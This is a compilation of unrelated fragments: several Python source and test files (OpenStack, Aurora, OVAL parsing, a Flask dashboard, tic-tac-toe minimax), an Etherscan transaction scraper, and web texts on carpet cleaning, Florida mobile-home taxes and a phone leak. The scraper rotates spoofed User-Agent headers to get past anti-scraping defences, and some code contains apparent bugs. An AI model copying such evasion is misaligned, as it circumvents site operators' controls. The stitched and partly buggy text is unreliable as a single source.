utils.TraverseHelper.remove(path, env_description)
save_description(session_id, env_description)
@staticmethod
def delete_env_template_data(env_template_id, path):
"""It deletes a template.
:param env_template_id: The env_template_id to be deleted.
:param path: The path to check.
"""
get_description = env_temp.EnvTemplateServices.get_description
save_description = env_temp.EnvTemplateServices.save_description
tmp_description = get_description(env_template_id)
if tmp_description is None:
msg = _('Environment Template <EnvId {0}> is not found').format(
env_template_id)
LOG.error(msg)
raise exc.HTTPNotFound(explanation=msg)
utils.TraverseHelper.remove(path, tmp_description)
save_description(tmp_description, env_template_id)
|
There are several advantages to hiring professional carpet cleaners to help you clean your carpet. If this has never been an option for you before, it is time you start considering it. Some of the benefits you can get from hiring professional carpet cleaners are better cleaning services than you could ever hope to get from all the effort you put in, solutions for any kind of dirt and spills, and so much more. Because they are professionally trained, carpet cleaners know how to effectively clean carpets with the best tools possible.
In addition to removing just dust and dirt, professional carpet cleaners are also highly capable of removing allergens from your carpet, ensuring that your carpet is clean and germ free. This will safeguard you from possible allergies and health concerns. Part of the reason that it is important to use professional carpet cleaners for removing allergens is that they use advanced equipment as well as methodology. This increases the suction power of their tools and by extension the overall effect of the cleaning process. The ultimate result is that your carpet is thoroughly cleaned and will provide you relief. If you or any of your family members suffer from allergies, regularly using professional carpet cleaners will greatly ease your discomfort and allow you to live comfortably.
Hiring a professional carpet cleaner will also improve the aesthetic beauty of your carpet. This is important as you usually use carpets to improve the aesthetic appeal of any room. Any kind of carpet adorning a room is usually the first thing that catches the eye of any visitor. The visual appeal of carpets can only be enhanced when they are properly and thoroughly cleaned. No matter how much effort and time you put in, you will not be able to achieve the standards of a professional carpet cleaner. Hired professionals using their specialised modern technology, tools, and gears can make your carpet look as good as new.
Yet another benefit is that you can use these professionals to help you clean your curtains and other upholstery as well along with your carpet. Calling them just once as a trial will show you the several advantages of hiring professional cleaners for your cleaning purposes. At the end of this visit, you are sure to feel the difference of an absolutely clean room that looks fresh and new.
In addition to all of the services mentioned above, also remember that you can save a lot of your time as well as effort and this is one of the main reasons you should consider hiring a professional carpet cleaning service. You can simply take a step back and relax while your house is brought to being as good as new. You can use this time to relax and maybe even pursue a new hobby!
The advantages listed above have hopefully opened your eyes to the advantages of hiring a professional carpet cleaning service for not only your carpet but also all your upholstery. But, make sure before you hire a service that you do sufficient research and talk to previous clients in order to ensure you are getting the best value for your money. The advantages you stand to gain are huge and not just minor. Before you decide to hire a professional service permanently, make sure to try out a few different ones.
Next article How Cloud will support the Internet of Things?
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
from mock import patch
from twitter.common.contextutil import temporary_file
from apache.aurora.client.cli import EXIT_COMMAND_FAILURE
from apache.aurora.client.cli.client import AuroraCommandLine
from .util import AuroraClientCommandTest, FakeAuroraCommandContext
class TestClientCreateCommand(AuroraClientCommandTest):
def test_list_configs(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(['config', 'list', fp.name])
assert mock_context.out == ['jobs=[west/bozo/test/hello]']
assert mock_context.err == []
def test_list_configs_invalid(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_invalid_config("blather=..."))
fp.flush()
cmd = AuroraCommandLine()
result = cmd.execute(['config', 'list', fp.name])
assert result == EXIT_COMMAND_FAILURE
assert mock_context.out == []
assert any(line.startswith("Error loading configuration file: invalid syntax") for line in
mock_context.err)
def get_config_with_no_jobs(self):
return textwrap.dedent("""
HELLO_WORLD = Job(
name = '%(job)s',
role = '%(role)s',
cluster = '%(cluster)s',
environment = '%(env)s',
instances = 20,
update_config = UpdateConfig(
batch_size = 5,
watch_secs = 10,
max_per_shard_failures = 2,
),
task = Task(
name = 'test',
processes = [Process(name = 'hello_world', cmdline = 'echo {{thermos.ports[http]}}')],
resources = Resources(cpu = 0.1, ram = 64 * MB, disk = 64 * MB),
)
)
""")
def test_list_configs_nojobs(self):
mock_context = FakeAuroraCommandContext()
with patch('apache.aurora.client.cli.config.ConfigNoun.create_context',
return_value=mock_context):
with temporary_file() as fp:
fp.write(self.get_config_with_no_jobs())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(['config', 'list', fp.name])
assert mock_context.out == ["jobs=[]"]
assert mock_context.err == []
|
The Property Appraiser is required by law to determine how your Mobile Home (also known as a Manufactured Home) will be classified for property tax purposes. The classification is based upon whether or not it is located on land owned by the Mobile Home owner or on land owned by another (i.e., Mobile Home Park).
I just purchased a Mobile Home for the first time and put it on my lot. Is there anything I have to do?
Yes. Pursuant to Florida Statutes, if you own the land and the Mobile Home, you must apply for Real Property (RP) decals and declare the Mobile Home as real property. When you first purchased the Mobile Home, you should have been issued a decal that expires December 31 of that year.
How do I get a Real Property (RP) decal?
Visit either one of the Property Appraiser's Offices and bring the deed to the land and the Title or Registration to the Mobile Home (two Titles or Registrations if it is a double wide). The staff will complete a DR-402 form which declares the Mobile Home to be real property. This form should be taken to the Tax Collector's Office, where you may purchase a Real Property (RP) decal which is valid for as long as you own both the Mobile Home and the land.
How often do I purchase a Real Property (RP) decal?
You only have to purchase a Real Property (RP) decal one time. If the Mobile Home is already on the land when you purchase it, the previous owner may have already purchased a Real Property (RP) decal. If so, you do not have to purchase new ones, unless the decal is not visible on the home.
If I did not receive a title or registration when I purchased my mobile home, will I be able to purchase my real property (RP) decal?
No. The Title needs to be transferred to the owner of the land before a Real Property (RP) decal can be issued. Contact the Tax Collector's Office for more information.
How long does the dealer have to get the Manufacturer's Statement of Origin and the Title application to the Tax Collector so I may get my registration?
The dealer has 30 days from the date of closing. The Tax Collector will issue a registration for the Mobile Home and send the Manufacturer's Statement Of Origin and title application to the Department of Motor Vehicles where the Title is processed. The Title will be mailed to the owner if there is no lien on the Mobile Home. If there is a lien, it will be mailed to the lienholder.
After I purchase my Real Property (RP) decal, do I have to place it on my Mobile Home?
Yes. If the Mobile Home is a singlewide, place the decal in a window that is visible to the appraiser. If the Mobile Home is a doublewide, be sure to put the proper decal on the half which is specified on the registration. Your home will be assessed as real property and you will be required to pay taxes on the Mobile Home, land and attachments.
I purchased a Mobile Home in another county and moved it onto my property here. The Mobile Home already has a Real Property (RP) decal. Do I still need to apply for my own?
Once a Mobile Home is assessed as real property, will it be treated the same next year?
Yes. The Mobile Home will be assessed to the landowner unless the landowner can provide to the Property Appraiser's Office a registration or title in the name of the individual to be assessed.
If I do not own the land, where and how do I purchase a Mobile Home (MH) decal and how much do these decals cost?
This decal must be purchased each year during the month of December from the Tax Collector's Office. The prior year's Mobile Home (MH) decal is valid until December 31. (The Tax Collector has a rate schedule used for computation of decal prices and the rate is determined by the length of the mobile home.) Singlewides need one decal, doublewides need two, etc.
Does the Mobile Home (MH) decal exclude my Mobile Home from a property tax assessment?
In part, it does. The Mobile Home (MH) decal only covers the mobile itself. It does not cover any attachments (i.e., air conditioning units, carports, etc.).
If my Mobile Home has been assessed for taxation because I have been delinquent in purchasing a decal, how do I get the Mobile Home portion taken off the tax roll?
You must purchase decals for all the years you were delinquent, except for those years you paid tax on the Mobile Home. You must show proof that you have brought your decals up to date and that the Mobile Home owner does not own the land. Once proof of ownership has been provided and decals are current, the Mobile Home portion of the assessment can be deleted from the tax roll.
When do my Mobile Home (MH) decals expire?
Mobile Home (MH) decals expire on December 31. Travel trailer or recreational vehicles have license plates which expire on your birthday.
Is the assessment and taxation of Mobile Homes the same as it is for houses?
Not always. Mobile Homes in parks where the Mobile Home owner rents lot space from the park are taxed through the annual purchase of a Mobile Home (MH) decal. The attachments to the Mobile Home are assessed and taxed as Tangible Personal Property. The major portion of the tax, which is on the land, is paid by the owner of the park.
Am I required to obtain and file a Tangible Personal Property tax return on my Mobile Home and its attachments?
Hernando County does not require tax returns to be filed for Mobile Homes. The Property Appraiser's Office goes out to measure and assess Mobile Homes and attachments to insure uniformity in value.
I own a recreational vehicle and a park trailer. Do I have to register them as Mobile Homes?
No. When a trailer is being registered for the first time in the applicant's name, the recreational vehicle must be classified as such and registered with a license plate and validation decal instead of a Mobile Home (MH) or permanent decal. A Real Property (RP) decal will be issued if the travel trailer is affixed to the owner's land.
Can a Mobile Home owner qualify for Homestead Exemption?
If you hold title to a permanently affixed Mobile Home and the land on which it is situated, you must make application to the Property Appraiser's Office for a Real Property (RP) decal. The decal is purchased at the Tax Collector's Office. The Mobile Home and land will be assessed as real property. Homestead Exemption may be granted if the Mobile Home meets those requirements and you qualify for the exemption.
I own the land and the Mobile Home but I do not have a Real Property (RP) decal. Will this effect my Homestead Exemption?
Yes. When you apply for the Homestead Exemption, you must also apply for your Real Property (RP) decal if you have not already done so or the previous owner did not have one. If you are not sure if you have one, you need to contact the Tax Collector's Office and get a replacement decal.
What if I cannot get my Title or Registration in time to file for the Homestead Exemption?
As long as the Mobile Home was on the property January 1 of the year filing, and you meet all other criteria, you can file for a Homestead Exemption. You do need to get your Title or Registration as soon as possible, or your exemption for the current year may be denied. You need to contact either the dealer, title company or lien holder (if financing is involved) and make sure the Manufacturer's Statement of Origin or Title has been sent to the Tax Collector's Office to generate a registration. (You may not receive the actual Title until the lien is paid in full.) You must bring the Title or Registration to the Property Appraiser's Office and apply for your Real Property (RP) decal.
Our GIS Interative Map can assist you. Select the Location tab within the Parcel Summary.
|
#!/usr/bin/python3
# Run the regular daily import of data, with error logging
#
# Author: Alex Zylstra
# Date: 2014/05/17
# License: MIT
from DB import DB, FILE
from scripts import *
from fetch import *
import datetime
import logging
logging.basicConfig(filename='StockDB.log',level=logging.INFO)
import smtplib
def run():
"""Run the daily data import."""
errors = add_all_to_db()
for err in errors:
logging.error("Error: {0}".format(err))
# Attempt to email:
try:
dt = datetime.date.today()
date = str(dt.year) + '-' + str(dt.month) + '-' + str(dt.day)
fromaddr = 'root@db.azylstra.net'
toaddrs = 'alex@azylstra.net'.split()
# Construct the message
subject = "StockDB report"
body = 'Date: ' + date + '\n'
body += 'Number of errors: ' + str(len(errors)) + '\n\n'
for err in errors:
body += "Error: {0}".format(err) + '\n'
msg = 'Subject: %s\n\n%s' % (subject, body)
server = smtplib.SMTP('localhost')
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
except Exception as err:
logging.error("Error: {0}".format(err))
run()
|
Professor Peter Aubusson (left) from the University of Technology and Charles Sturt University Executive Dean Professor Toni Downes (right) sign agreements with Federation General Secretary John Dixon about payments for teachers supervising prac students.
Significant salary increases have been achieved for teachers supervising teacher education ‘professional experience’ placements in NSW public schools.
From 2015, supervising teachers will receive an all-inclusive daily payment of $28.50 per student (a 34.4 per cent rise). This increases to $29.25 (2.6 per cent) in 2016 and $30 (2.6 per cent) in 2017 in recognition of the work teachers undertake in the professional development of teacher education students.
The payment does not apply to the supervision of teacher education students undertaking internships as part of their university’s professional experience program. Payments for those types of internships are under separate agreements.
So far Federation has signed agreements with the University of Technology, Sydney, and Charles Sturt, NSW, Sydney and Newcastle universities. The union has in-principle agreements with Southern Cross, New England, Wollongong, Australian Catholic and Notre Dame universities and these agreements are expected to be settled for the new academic year.
The union encourages members to participate in the supervision of teacher education students on professional experience placements. The profession needs to ensure that teacher education students are prepared for their future careers in classrooms through quality professional experience in NSW public schools.
Federation has stressed that teachers’ professional judgement should be respected in the assessment of future teachers under their supervision in the union's discussions with universities.
|
#!/usr/bin/python
import sys
import os
import errno
import string
import re
from optparse import OptionParser
import lxml.etree as ET
xmlns = {
"o": "http://oval.mitre.org/XMLSchema/oval-definitions-5",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"oval": "http://oval.mitre.org/XMLSchema/oval-common-5",
"unix": "http://oval.mitre.org/XMLSchema/oval-definitions-5#unix",
"linux": "http://oval.mitre.org/XMLSchema/oval-definitions-5#linux",
"ind": "http://oval.mitre.org/XMLSchema/oval-definitions-5#independent",
}
def parse_options():
usage = "usage: %prog [options] input_file [input_file . . .]"
parser = OptionParser(usage=usage, version="%prog ")
parser.add_option("-o", dest="out_dname", default="/tmp/checks",
help="name of output directory. If unspecified, default is a new directory \"/tmp/checks\"")
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
sys.exit(1)
return (options, args)
# look for any occurrences of these attributes, and then gather the node
# referenced
def gather_refs(element, defn):
items_with_refs = element.findall(".//*[@test_ref]")
items_with_refs.extend(element.findall(".//*[@var_ref]"))
items_with_refs.extend(element.findall(".//*[@state_ref]"))
items_with_refs.extend(element.findall(".//*[@object_ref]"))
for item in items_with_refs:
for attr in item.attrib.keys():
if attr.endswith("_ref"):
ident = item.get(attr)
referenced_item = id_element_map[ident]
if referenced_item not in def_reflist_map[defn]:
def_reflist_map[defn].append(referenced_item)
gather_refs(referenced_item, defn)
def gather_refs_for_defs(tree):
defn_elements = tree.getiterator("{" + xmlns["o"] + "}definition")
# initialize dictionary, which maps definitions to a list of those things
# it references
for defn in defn_elements:
def_reflist_map[defn] = []
for defn in defn_elements:
gather_refs(defn, defn)
def output_checks(dname):
try:
os.makedirs(dname)
except OSError, e:
if e.errno != errno.EEXIST:
raise
# use namespace prefix-to-uri defined above, to provide abbreviations
for prefix, uri in xmlns.iteritems():
ET.register_namespace(prefix, uri)
os.chdir(dname)
for defn, reflist in def_reflist_map.iteritems():
# create filename from id attribute, get rid of punctuation
fname = defn.get("id")
fname = fname.translate(string.maketrans("", ""),
string.punctuation) + ".xml"
# output definition, and then all elements that the definition
# references
outstring = ET.tostring(defn)
for ref in reflist:
outstring = outstring + ET.tostring(ref)
with open(fname, 'w+') as xml_file:
# giant kludge: get rid of per-node namespace attributes
outstring = re.sub(r"\s+xmlns[^\s]+ ", " ", outstring)
xml_file.write("<def-group>\n" + outstring + "</def-group>")
return
def gather_ids_for_elements(tree):
for element in tree.findall(".//*[@id]"):
id_element_map[element.get("id")] = element
id_element_map = {} # map of ids to elements
def_reflist_map = {} # map of definitions to lists of elements it references
def main():
(options, args) = parse_options()
for fname in args:
tree = ET.parse(fname)
# ET.dump(tree)
gather_ids_for_elements(tree)
gather_refs_for_defs(tree)
output_checks(options.out_dname)
sys.exit(0)
if __name__ == "__main__":
main()
|
We here at MiMi Beauty Corp, the parent company of GE Productions and this site is comprised of business professionals to beauty supply pioneers to models to the directors of the largest hair companies in the world. One special officer is Jocelyn Davis, the Model Director of the Cuticle Remy XQ Hair Battle and Style Expo. She brings experience and the ability to personally and have a majority of professional celebrity stylists test out our hair.
Our team is dedicated to making every shopping experience the best and most amazing that you have ever had. We always guarantee 100% satisfaction in every aspect of your shopping experience. Not only is every bundle of hair guaranteed for at least 3 months, each individual here from the Executive President to the Customer Support Staff will be more than happy to personally guide you through your shopping experience. In fact, you will find at many times the President will be on the computers or phones to personally help and explain every detail that you wish to have explained!
We here at MiMi Beauty Corp will go through an length to make sure that YOU are happy with your purchase and are confident that you will be wearing our hair for years to come!
|
from cim_client import CIMClient
from snmp_client import SNMPClient
from flask import Flask, redirect, render_template, url_for
# Initiate Flask
app = Flask(__name__)
# Frontpage method redirecting to CIM dashboard
@app.route("/")
def index():
return redirect(url_for('cim_dashboard'))
# CIM dashboard method
@app.route("/cim")
def cim_dashboard():
client = CIMClient()
try:
os_info = client.get_os_info()
except:
os_info = 'not availible'
try:
ip_interfaces = client.get_ip_interfaces()
except:
ip_interfaces = []
return render_template('cim.html',
os_info=os_info, ip_interfaces=ip_interfaces)
# SNMP dashboard method
@app.route("/snmp")
def snmp_dashboard():
snmp = SNMPClient()
try:
os_info = snmp.getOs()
except:
os_info = "Host not availible"
try:
ip_interfaces = snmp.getNetwork()
except:
ip_interfaces = []
return render_template('snmp.html',
os_info=os_info, ip_interfaces=ip_interfaces)#, url_for=url_for())
# Run the server
if __name__ == "__main__":
app.run()
|
Until the abysmal Vanishing on 7th Street I thought Brad Anderson could do no wrong. Session 9 holds up, The Machinist is still a twisted indie classic and Tansiberrian is a Hitchcockian thrill-ride. Enter Anderson's new thriller from WWE studios and Tri-Star Picture, The Call starring Halle Berry, Abigail Breslin. Will it be enough to bring the director back into a our good graces?
The film was written by Richard D'Ovidio.
|
'''
Project - Tic Tic Tac Toe
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import sys#
import time#for wait of 1 seconds
import os
import random#for adding randomness into program so that the computer's move is not always the same
#display function start
def disp():
for x in range(3):
for y in range(3):
if a[x][y] == -100:
print "_ ",
elif a[x][y] == 0 :
print "O ",
else :
print "X ",
print "\n"
#display function end
#check function
def check():
for x in range(3):
sumrow = a[x][0] + a[x][1] + a[x][2]
if sumrow == 3:
return -100
elif sumrow == 0:
return 100
for x in range(3):
sumcol = a[0][x] + a[1][x] + a[2][x]
if sumcol == 3:
return -100
elif sumcol == 0:
return 100
sumdiag1 = a[0][0] + a[1][1] + a[2][2]
if sumdiag1 == 3:
return -100
elif sumdiag1 == 0:
return 100
sumdiag2 = a[0][2] + a[1][1] + a[2][0]
if sumdiag2 == 3:
return -100
elif sumdiag2 == 0:
return 100
flag = 0 #flag is for checking if any move is possible
for x in range(3):
for y in range(3):
if a[x][y] == -100:
flag = 1
return
#code can be optimized here by removing flag and playing with the return statement, if loop exits the nested for then no a[][]=-100 so return 0
if flag == 0:
return 0
#check funtion end
#input
def user_move():
x = int(input())
y = int(input())
if x>2 or x < 0 or y>2 or y<0 or a[x][y] != -100 :
print "illegal move"
user_move()
else :
a[x][y] = 1
#input close
#minmax start
def minmax(game,depth,move_whose):
if check() == 100:
return 100 - depth,0
if check() == -100:
return depth - 100,0
if check() == 0:
return 0,0
maximum =-10000
minimum = 10000
trick=0
trickmaxmove=0
tricksumminmove=0
trickmat = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if game[x][y] == -100:
if move_whose:
game[x][y] = 1
else:
game[x][y] = 0
temp,trick = minmax(game,depth+1,not(move_whose))
trickmat[x][y]=trick
if (temp==100-depth-1) and not(move_whose):#dont evaluate further if move is of computer and there is an instant win,
#THIS ALSO REDUCES THE TRICK CASES WHERE WE INSTEAD OF CLAIMING INSTANT WIN , TRY TO MAKE A TRICK
game[x][y]=-100
return temp,trick
#code can be optimized by moving these conditions into the if below
if (temp==100-depth-2)and (move_whose):
trick+=1
disp()
print "\n\n"
time.sleep(1)
if move_whose:
tricksumminmove+=trick
if minimum > temp:
minimum = temp
else:
if maximum < temp:
maximum = temp
trickmaxmove=trick
game[x][y] = -100
if depth==0:
print trickmat
if move_whose:
return minimum,tricksumminmove
else:
if tricksumminmove!=0:
print trickforminmove
return maximum,trickmaxmove
#next move
def ttt_move():
score = [[-10000 for x in range(3)] for x in range(3)]
trick = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if a[x][y] == -100:
a[x][y] = 0
score[x][y],trick[x][y] = minmax(a,0,True)#round(random.random(),2)
score[x][y]=score[x][y]+trick[x][y]#random() adds random values from 0 to 1 so that there is some randomness in the program
#depth = 0 for 1st time and 3rd parameter is whose move it is False == computer and True == user
a[x][y] = -100
maximum = -10000
bestx = 1
besty = 1
for x in range(3):
for y in range(3):
if score[x][y] > maximum:
maximum = score[x][y]
bestx = x
besty = y
a[bestx][besty] = 0
print score
print trick
#next move end
#initial choice
def initial_choice():
ans = raw_input("wanna play first?")
if ans == "n":
ttt_move()
disp()
elif ans == "y":
return
elif ans !="y":
print "type y or n"
initial_choice()
#initial_choice end
#int main
'''a trick is defined as a position where for every move of the opponent the pc wins ,
if there is no sure short win already
and if opponent plays a little non perfect by choosing the second least tree'''
a = [[-100 for x in range(3)] for x in range(3)]
initial_choice()
while True :
user_move()
disp()
if check() == -100:
sys.exit("YOU WON!!!")
elif check() == 0:
sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
print "thinking........"
time.sleep(1)
os.system('clear')
ttt_move()
disp()
if check() == 100:
sys.exit("YOU LOSE")
elif check() == 0:
sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
#int main end
|
Fixed — a solid platform to steady your rifleSpring loaded adjustable legs: 13-23" / 33-58.5cmGuaran..
Lever Tilt — features a lever to rapidly level your rifleSpring loaded adjustable legs: 13-23" / 33-..
Fixed — a solid platform to steady your rifleSpring loaded adjustable legs: 13-27" / 33-68.5cmGuaran..
Lever Tilt — features a lever to rapidly level your rifle Spring loaded adjustable legs: 13-27" / 3..
Fixed — a solid platform to steady your rifle Spring loaded adjustable legs: 6-9" / 15-23cm Guaran..
Lever Tilt — features a lever to rapidly level your rifleSpring loaded adjustable legs: 6-9" / 15-23..
Quick removal barrel clamp Spring loaded legs — twist to lock Rubber anti-slip feet Fits barrels ..
Fits barrels, Picatinny/weaver rails, swivel studsOne handed operationQuick release notched legs — S..
Fixed — a solid platform to steady your rifleSpring loaded adjustable legs: 9-13" / 23-33cmGuarantee..
Lever Tilt — features a lever to rapidly level your rifleSpring loaded adjustable legs: 9-13" / 23-3..
3way pivoting headSingle-handed leg extension Single-handed leg deployment..
|
def test_create_tax_include(oerp):
tax_code_obj = oerp.pool.get('account.tax.code')
tax_code_id = tax_code_obj.create(oerp.cr, 1, {
'name': 'ISS 2%',
'company_id': 1,
'sign': 1,
'tax_discount': 'TRUE',
'tax_include': 'TRUE',
'notprintable': 'TRUE',
'domain': 'iss'
})
assert tax_code_obj.browse(oerp.cr, 1, [tax_code_id])[0].id == tax_code_id
tax_obj = oerp.pool.get('account.tax')
tax_id = tax_obj.create(oerp.cr, 1, {
'sequence': '1',
'type_tax_use': 'all',
'applicable_type': 'true',
'company_id': 1,
'name': 'ISS 2%',
'amount': 0.0200,
'type': 'percent',
'tax_code_id': tax_code_id,
'base_reduction': 0.0000,
'amount_mva': 0.0000,
'price_include': 'FALSE',
'tax_discount': 'TRUE',
'tax_add': 'FALSE',
'tax_include': 'TRUE',
'tax_retain': 'FALSE',
'domain': 'iss',
})
assert tax_obj.browse(oerp.cr, 1, [tax_id])[0].id == tax_id
|
Winter is characterised by short cold days and long dark nights. Growing has stopped and the harvest is over. Animals bulked up by Autmn’s feast retreat, hibernate and live off what has been stored. A quietness and stillness descend upon the land. Seeds beneath the ground wait quietly for Spring’s call to grow again.
Winter is the most Yin time of year. Yin is dark, wet, slow and quiet. It recedes and receives. It is a time of rest which allows for repair and replenishment. It is a necessary balance to Summer’s extreme Yang activity of growing and expanding, its brightness, heat, and frenetic activity. Yang spends and Yin restores. Each needs the other to do its job.
I wish you all a wonderful season of celebrating. May 2019 bring health and abundance, joy and peace.
|
# django-openid-auth - OpenID integration for django.contrib.auth
#
# Copyright (C) 2013 Canonical Ltd.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.test import TestCase
from django_openid_auth.models import (
Permission,
UserOpenID,
)
class UserOpenIDModelTestCase(TestCase):
def test_create_useropenid(self):
user = User.objects.create_user('someuser', 'someuser@example.com',
password=None)
user_openid, created = UserOpenID.objects.get_or_create(
user=user,
claimed_id='http://example.com/existing_identity',
display_id='http://example.com/existing_identity')
self.assertEqual('someuser', user_openid.user.username)
self.assertEqual(
user_openid.claimed_id, 'http://example.com/existing_identity')
self.assertEqual(
user_openid.display_id, 'http://example.com/existing_identity')
self.assertFalse(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
def test_delete_verified_useropenid(self):
user = User.objects.create_user('someuser', 'someuser@example.com',
password=None)
user_openid, created = UserOpenID.objects.get_or_create(
user=user,
claimed_id='http://example.com/existing_identity',
display_id='http://example.com/existing_identity')
permission = Permission.objects.get(codename='account_verified')
user.user_permissions.add(permission)
self.assertTrue(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
user_openid.delete()
self.assertFalse(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
|
Stocks & Commodities V. 23:5 (75-81): Traders’ Tips by Technical Analysis, Inc.
Home > Articles > Volume 23 (2005) > Chapter 5 (May 2005) > Stocks & Commodities V. 23:5 (75-81): Traders’ Tips by Technical Analysis, Inc.
Stuart Belknap's article "Cycles In Time And Money" describes an algorithm for ploting a centered cycle oscillator. Trader's Tips supplies code for his indicator, the universal cycle index (UCI), which is intended to be "in phase" with the market and to operate in real time.
Code is given for the following programs: TradeStation, Wealth-Lab, AmiBroker, eSignal, NeuroShell Trader, NeoTicker, AIQ, and Aspen Graphics. MetaStock code for the UCI was provided in his article.
|
#-*-coding:utf-8 -*-
# 将ETHSCAN记录保存的脚本
import urllib.request as urllib2
from urllib import request
import random
from bs4 import BeautifulSoup
'''
# user_agent是爬虫与反爬虫斗争的第一步
ua_headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
}'''
# 用于模拟http头的User-agent
ua_list = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
]
user_agent=random.choice(ua_list)
#要查询的以太地址
address="0xBD9d6e7489A7b450937fA7ECbAbd71Be819beE3D"
page_number_start=0
page_count=10
for ii in range(page_count):
page_number_start=page_number_start+1
page_number=str(page_number_start)
url="https://etherscan.io/txs?a="+address+"&p="+page_number
# 通过Request()方法构造一个请求对象
request1=urllib2.Request(url=url)
# 把头添加进去
request1.add_header('User-Agent',user_agent)
# 向指定的url地址发送请求,并返回服务器响应的类文件对象
response=urllib2.urlopen(request1)
# 服务器返回的类文件对象支持python文件对象的操作方法
#html=response.read()
#print(html.decode('utf-8'))
soup=BeautifulSoup(response,"html.parser")
k=0
for i in soup.find_all('td',limit=400):
k=k+1
m=k%8
if m==0:
br='\n'
else:
br=''
tbody=i.get_text()
data=str(tbody.encode('gbk','ignore'))+","+br
with open('test11.csv', 'a') as f:
f.write(data)
print("已完成:",str(page_number)+"/"+str(page_count))
|
We have had several Galaxy S5 mini leaks, we’ve come to know its specs through various sources and we even came across a picture of it. Today, we have alleged pictures of the device along with new specifications.
The supposed Galaxy S5 mini in the leaked pictures looks a lot like the Galaxy S5 with few minor differences. There’s the same back with the dotted pattern design, the heart rate monitor below the camera, the same rubber padding is present underneath the back panel as well. The picture also shows the fingerprint scanner in action.
The difference lies in the fact that the dotted pattern stretches to the sides more than what we’ve seen on the Galaxy S5. The smaller battery also confirms that this indeed in the S5 mini. The top does not features a cover on the microUSB port, which suggests the device won’t be water and dust resistant.
The source also reveals the specifications, which are different from what we’ve heard till now. According to the source, the Galaxy S5 mini will be powered by a new Exynos 3 Quad (Exynos 3470) chipset with a quad-core 1.4 GHz processor with Mali-400 MP4 GPU and not the Snapdragon 400. The device will also come with 1.5 GB RAM. Rest of the specs are the same we’ve known all this while, a 4.5-inch 720p display, 8 MP rear camera, 2.1 MP front facing camera, 16 GB internal storage with microSD expansion.
We can expect the Galaxy S5 mini to go official soon, as the other Galaxy S5 variants have already been unveiled. The K Zoom aka the S5 Zoom was unveiled last month while the Galaxy S5 Active was launched yesterday. The Galaxy S5 mini seems like a great mid-range device but ultimately, everything depends on the price it is launched at.
|
"""A simple number and datetime addition JSON API.
Run the app:
$ python examples/bottle_example.py
Try the following with httpie (a cURL-like utility, http://httpie.org):
$ pip install httpie
$ http GET :5001/
$ http GET :5001/ name==Ada
$ http POST :5001/add x=40 y=2
$ http POST :5001/dateadd value=1973-04-10 addend=63
